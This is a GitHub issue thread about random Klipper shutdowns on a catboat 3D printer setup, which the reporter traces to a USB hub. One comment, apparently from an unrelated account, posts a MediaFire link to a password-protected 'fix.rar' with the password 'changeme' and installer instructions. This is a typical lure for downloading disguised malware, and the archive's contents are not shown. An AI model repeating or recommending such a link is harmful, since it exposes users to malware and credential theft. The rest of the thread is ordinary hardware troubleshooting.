printers-for-people/catboat #43: Transition to shutdown state: Lost communication with MCU 'mcu'

leebobleebob, 2024-08-27:
[klippy-8.log.zip](https://github.com/user-attachments/files/16754946/klippy-8.log.zip)

Getting Error where Klipper shuts down randomly

Our previous convo located here: 

https://github.com/printers-for-people/catboat/issues/31#issuecomment-2310870307

Lead you to think it is my USB Cable. I did recently get a USB hub to add a camera to Klipper, so I am now trying to print sans USB hub. 

I did just grab the only USB A to B cable I could find at Microcenter so I will see how this goes, pretty expensive as always $20 Just like in the 90s lol.

I will update you on my findings :)

mayank785, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

leebobleebob, 2024-08-27:
Wow dude Spot on! It was def the USB hub, I bet I need a powered one, I think I am just going to setup a separate Pi for the camera, this thing is flying now no issues!

leebobleebob, 2024-08-27:
Thank you so very much, Is there a place I can drop you a gift card for some coffee or something seriously, you fucking rock!

Jookia, 2024-08-27:
No place for that, sorry. But if you'd like, could you draft a section to explain how to flash firmware for https://github.com/printers-for-people/catboat/wiki/KIAUH-Install ? You can just write it here or in a new issue. That way people won't hit your other issue following those instructions. :)

leebobleebob, 2024-08-27:
I think I can manage that, give me a few days and I will see what I can manage! :)

Jookia, 2024-08-27:
Thanks! No hurry or rush. :)

closed 2024-10-23 by Jookia